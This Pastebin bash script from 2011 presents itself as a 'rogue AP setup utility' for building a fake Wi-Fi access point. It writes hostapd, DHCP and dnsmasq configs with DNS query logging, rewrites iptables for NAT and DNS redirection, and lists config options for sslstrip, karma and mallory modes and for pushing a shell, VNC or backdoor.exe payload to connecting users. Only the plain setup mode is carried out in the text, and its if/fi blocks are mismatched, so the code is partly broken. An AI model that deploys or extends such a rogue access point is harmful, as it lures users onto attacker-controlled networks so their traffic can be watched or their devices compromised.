ak47suk1

make your own ap

Oct 12th, 2011
153
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. #y0-
  3.  
  4. # dependencies
  5. # sudo apt-get install dnsmasq hostapd dhcp3-server
  6.  
  7. version=0.1
  8. show_help(){
  9.         echo "A rogue AP setup utility v$version inspired from Airsnarf Shmoo. "
  10.     echo "Copyright (c) 2011 USIM Student Batch 2007-2011. All rights reserved"
  11.     echo
  12.         echo "Usage:    $0  [options]"
  13.         echo "Options:"
  14.         echo "-s    : show config"
  15.         echo "-r    : run this config"
  16.         echo "-h    : show this help message and exit"
  17. }
  18. show_config(){
  19. head -n 68 $0
  20. }
  21.  
  22. while [[ $# != 0 ]]; do
  23.     arg_name=$1; shift
  24.     case "$arg_name" in
  25.       -h) show_help; exit 0;;
  26.       -s) show_config; exit 0;;
  27.       -r) t=$arg_name;break;;
  28.       *) echo "invalid option: $1"; show_help;exit 1;;
  29.     esac
  30. done
  31. [ "$t" != "-r" ] && { show_help; exit 1; }
  32.  
  33.  
  34. ################################################
  35. # Here are some variables you may want to edit
  36. ################################################
  37. BMODE="non-bridge" # BMODE can be: bridge, non-bridge or karma
  38. MODE="simple" # MODE can be: simple, mallory, sslstrip, captive, milk
  39.  
  40. INET_IFACE="ppp0" #ppp0 #tun0
  41. HOSTAP_WIFI_IFACE="wlan0" # Tested on ath5k/ath9k/rt73usb based cards
  42. BRIDGE_IFACE="br0"
  43. CHAN="7"
  44. SSID="mysabily.blogspot.com" # Boleh tukarSSID kepada nama lain
  45.  
  46. INET_GW="113.211.116.196" #10.8.0.6 # Set external IP di sini check guna whatismyipaddress.com
  47. LAN_IP="192.168.2.1"
  48. NETMASK="255.255.255.0"
  49. NETWORK="192.168.2.0/24"
  50. BROADCAST_IP="192.168.2.255"
  51. SUBNET="192.168.2.0"
  52. RANGE_IP="192.168.2.3 192.168.2.254"
  53. DHCP_MIN="192.168.2.3"
  54. DHCP_MAX="192.168.2.254"
  55. DOMAIN="usim.edu.my"
  56. OPTION_NETBIOS_NAME_SERVERS="192.168.2.252"
  57. ACL_LOCALNET_SRC="192.168.0.0/16"
  58. #OPDNS="208.67.222.220, 208.67.222.222, 4.2.2.1, 4.2.2.2, 208.67.216.132, 208.67.216.132"
  59. #OPDNS="8.8.8.8,8.8.4.4"
  60. OPDNS="58.71.136.10,58.71.132.10" # Set DNS di sini
  61. DNS="$INET_GW, $OPDNS" ##DNSpppX = "YOUR ISP DNS SERVER, $OPDNS"
  62. #DNS="$OPDNS"
  63.  
  64. payload="" # payload can be : sbd/vnc/wkv/other (what to upload to the user). vnc=remote desktop, sbd=shell, wkv=View WiFi keys. (/path/to/file), only used if payload is "other"
  65. backdoorPath="/tmp/backdoor.exe"
  66. port=$(shuf -i 2000-65000 -n 1)
  67.  
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76.  
  77. echo "----------------------------------------------------------------------"
  78. echo "A rogue AP setup utility v$version inspired from Airsnarf Shmoo. "
  79. echo "Copyright (c) 2011 USIM Student Batch 2007-2011. All rights reserved"
  80. echo "----------------------------------------------------------------------"
  81.  
  82. echo  "[*] Testing internet connection...";
  83. command=$(ping -I $INET_IFACE -c 1 google.com |grep "64 bytes from" |cut -d' ' -f 4);
  84. if [ -z $command ] ; then echo "[!] Internet access failed. "; exit 1 ; else echo "[-] Got internet access..." ; fi;
  85.  
  86. mkdir -p "$(pwd)/tmp/"
  87. HOME_DIR="$(pwd)/tmp"
  88.  
  89. # Create the hostapd.conf
  90. mkdir -p /tmp/hostapd > /dev/null 2>&1
  91. rm /tmp/hostapd/hostapd.conf > /dev/null 2>&1
  92. rm /tmp/hostapd/hostapd.pid > /dev/null 2>&1
  93.  
  94. cat > /tmp/hostapd/hostapd.conf << EOF
  95. driver=nl80211
  96. logger_syslog=-1
  97. logger_syslog_level=2
  98. logger_stdout=-1
  99. logger_stdout_level=1
  100. ssid=$SSID
  101. hw_mode=g
  102. channel=$CHAN
  103. beacon_int=100
  104. dtim_period=2
  105. max_num_sta=255
  106. rts_threshold=2347
  107. fragm_threshold=2346
  108. macaddr_acl=0
  109. auth_algs=3
  110. ignore_broadcast_ssid=0
  111. #wmm_enabled=1
  112. eapol_key_index_workaround=0
  113. eap_server=0
  114. own_ip_addr=127.0.0.1
  115. # WPA settings. We'll use stronger WPA2
  116. # bit0 = WPA
  117. # bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
  118. wpa=2
  119.  
  120. # Preshared key of between 8-63 ASCII characters.
  121. # If you define the key in here, make sure that the file is not readable
  122. # by anyone but root. Alternatively you can use a separate file for the
  123. # key; see original hostapd.conf for more information.
  124. # Set WPA key di sini
  125. wpa_passphrase=passwordaku
  126.  
  127. # Key management algorithm. In this case, a simple pre-shared key (PSK)
  128. wpa_key_mgmt=WPA-PSK
  129.  
  130. # The cipher suite to use. We want to use stronger CCMP cipher.
  131. wpa_pairwise=CCMP
  132.  
  133. # Change the broadcasted/multicasted keys after this many seconds.
  134. wpa_group_rekey=600
  135.  
  136. # Change the master key after this many seconds. Master key is used as a basis
  137. # (source) for the encryption keys.
  138. wpa_gmk_rekey=86400
  139.  
  140. EOF
  141.  
  142. echo "interface=$HOSTAP_WIFI_IFACE" >> /tmp/hostapd/hostapd.conf
  143.  
  144. echo "INTERFACES=\"\"" > /etc/default/dhcp3-server
  145.  
  146. if [ "$BMODE" == "non-bridge" ]; then
  147. ifconfig $HOSTAP_WIFI_IFACE down && sleep 2
  148. ifconfig $HOSTAP_WIFI_IFACE up && sleep 2
  149. ifconfig $HOSTAP_WIFI_IFACE $LAN_IP netmask $NETMASK
  150. route add -net $SUBNET netmask $NETMASK gw $LAN_IP
  151.  
  152. echo -e "[*] Starting DHCP Server.. "
  153.  
  154. # Create custom dhcpd.conf
  155. path="$HOME_DIR/dhcpd.conf"
  156. if [ -e "$path" ] ; then rm "$path"; fi
  157. echo -e "#
  158. ddns-update-style none;
  159. ignore client-updates; # Ignore all client requests for DDNS update
  160. authoritative;
  161. default-lease-time 86400; # 24 hours
  162. max-lease-time 172800;    # 48 hours
  163. log-facility local7;\n
  164. subnet $SUBNET netmask $NETMASK {
  165. range $RANGE_IP;
  166. option routers $LAN_IP;
  167. option subnet-mask $NETMASK;
  168. option broadcast-address  $BROADCAST_IP;
  169. option domain-name \"$DOMAIN\"; " >> $path
  170.  
  171. echo " option domain-name-servers $DNS;" >> $path
  172. #echo " option domain-name-servers $LAN_IP;" >> $path #non tranparant
  173.  
  174. echo -e " option netbios-name-servers $OPTION_NETBIOS_NAME_SERVERS;\n}" >> $path
  175.  
  176. cp $HOME_DIR/dhcpd.conf /etc/dhcp3/dhcpd.conf
  177. rm /var/run/dhcpd.pid
  178. ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
  179. dhcpd3 -cf /etc/dhcp3/dhcpd.conf $HOSTAP_WIFI_IFACE -pf /var/run/dhcpd.pid
  180.  
  181. echo -e "[*] Starting DNS forwarder... "
  182.  
  183. path="$HOME_DIR/dnsmasq.conf"
  184. if [ -e "$path" ] ; then rm "$path" ; fi
  185. echo -e "#
  186. interface=$LAN_IFACE
  187. domain=$DOMAIN
  188. #dhcp-range=$DHCP_MIN,$DHCP_MAX,24h
  189. #dhcp-authoritative
  190. #dhcp-option=3,$LAN_IP # Gateway" >> $path
  191. #echo -e "dhcp-option=6,$LAN_IP # DNS" >> $path #non tranparant
  192. echo -e "dhcp-option=6,$DNS # DNS" >> $path ; fi
  193. echo -e "log-queries
  194. #log-dhcp
  195. log-facility="$HOME_DIR/dnsmasq.log"" >> $path
  196.  
  197. # Solve our DNS Forwarder
  198. dnsmasq -C $HOME_DIR/dnsmasq.conf&
  199.  
  200. ##########################################################################
  201. # Simple WLAN setup (clients can access Internet)
  202. if [ $MODE = "simple" ];then echo -e "[*] Starting simple WLAN setup...."
  203. iptables --flush
  204. iptables --table nat --flush
  205. iptables --delete-chain
  206. iptables --table nat --delete-chain
  207.  
  208. iptables -t nat -A POSTROUTING -o $INET_IFACE -j MASQUERADE
  209. iptables -A FORWARD -i $HOSTAP_WIFI_IFACE -j ACCEPT
  210. iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $INET_GW
  211.  
  212. echo 1 > /proc/sys/net/ipv4/ip_forward
  213. sleep 1
  214.  
  215. /etc/init.d/dhcp3-server restart > /dev/null 2>&1
  216. sleep 1
  217.  
  218. echo "Starting AP..."
  219. hostapd -dd -P /tmp/hostapd/hostapd.pid /tmp/hostapd/hostapd.conf
  220.  
RAW Paste Data